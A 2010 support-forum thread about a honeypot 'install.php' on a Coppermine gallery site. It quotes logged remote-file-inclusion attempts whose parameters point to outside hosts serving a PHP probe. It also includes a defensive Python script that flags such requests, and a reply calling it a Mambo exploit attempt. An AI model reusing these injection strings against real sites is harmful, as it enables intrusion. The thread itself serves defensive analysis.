Attack to CPG 1.4.x target "install.php"

Started by brix, August 27, 2010, 10:45:57 AM

brix

Hi all,

I know that after installation you must delete "install.php" for any CMS but often that does not happen.

One of our users (an Italian website) has recently had attacks on the file "install.php", so I suggested removing it.

He did, and one of his staff created a fake "install.php" bait that keeps a log of the hacking attempts.

I hope it will be useful to know which attack is executed, and for that reason I paste the contents of the log created by the bait:
Log:

Sunday 15th of August 2010 09:09:59 AM - 146.83.237.120 - Mozilla/5.0 - mosConfig_absolute_path=http://www.songdosarang.org/skin/head??
Sunday 15th of August 2010 10:12:14 AM - 70.86.235.162 - Mozilla/5.0 - error=http://devilbat.fileave.com/zfxid1.txt?

Comment:

Caught!
It seems that finally the fish has the bait!
On that day in August there were a couple of intrusion attempts; the result is these two lines:
Sunday 15th of August 2010 9:09:59 AM - 146.83.237.120 - Mozilla/5.0 - http://www.songdosarang.org/skin/head mosConfig_absolute_path =?
Sunday 15th of August 2010 10:12:14 AM - 70.86.235.162 - Mozilla/5.0 - error = http://devilbat.fileave.com/zfxid1.txt?

The first IP is from Chile, on a university network, and the second from a U.S. hosting service; probably in both cases it is a botnet and the owners of the IPs are unaware and innocent.

Both attacks link to a URL in the parameters passed to the Coppermine installer; by visiting the URL you get (as expected) the PHP string that they wanted to inject into this site:
<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>

If this thread is of some use, I was pleased to collaborate in the protection of Coppermine, with the help of our users. Thanks.
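One way to triage such a bait log from the defender's side, as an added example that is not part of the post and not Coppermine code: it parses lines in the "date - IP - user-agent - query" layout quoted above and flags any parameter whose value is a remote URL, which is the remote-file-inclusion pattern shown in both logged lines. The IPs and hosts in the sample are constructed placeholders, not the real ones.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in the same layout as the bait log quoted in the
# post; the IPs and hosts are placeholders, not the real attacker values.
SAMPLE_LOG = """\
Sunday 15th of August 2010 09:09:59 AM - 192.0.2.10 - Mozilla/5.0 - mosConfig_absolute_path=http://remote.example/skin/head??
Sunday 15th of August 2010 10:12:14 AM - 198.51.100.7 - Mozilla/5.0 - error=http://remote.example/z.txt?
Monday 16th of August 2010 08:00:00 AM - 203.0.113.5 - Mozilla/5.0 - lang=english
"""

# "timestamp - ip - user-agent - query string" as written by the bait.
LINE_RE = re.compile(r"^(?P<ts>.+?) - (?P<ip>[\d.]+) - (?P<ua>.+?) - (?P<query>.*)$")


def parse_line(line):
    """Split one bait log line into its fields, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def remote_includes(query):
    """Return (parameter, host) pairs whose value is an absolute http(s) URL.

    A parameter pointing at a foreign host (mosConfig_absolute_path in the
    first line, error in the second) is the hallmark of an RFI probe: the
    target script is expected to include() the remote file as PHP.
    """
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        parts = urlsplit(value.strip())
        if parts.scheme in ("http", "https") and parts.netloc:
            hits.append((name, parts.netloc))
    return hits


def find_rfi_probes(log_text):
    """Scan a whole bait log and report source IP, parameter and remote host."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        for param, host in remote_includes(rec["query"]):
            findings.append({"ip": rec["ip"], "param": param, "host": host})
    return findings


if __name__ == "__main__":
    for f in find_rfi_probes(SAMPLE_LOG):
        print(f"RFI probe from {f['ip']}: {f['param']} -> {f['host']}")
```

The third sample line, a plain `lang=english` request, is ignored, so only parameters carrying a remote URL are reported.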

brix

Sorry, I pushed the "solved" button but it is not :-(

Nibbler

That's a mambo exploit attempt. It won't do anything to Coppermine.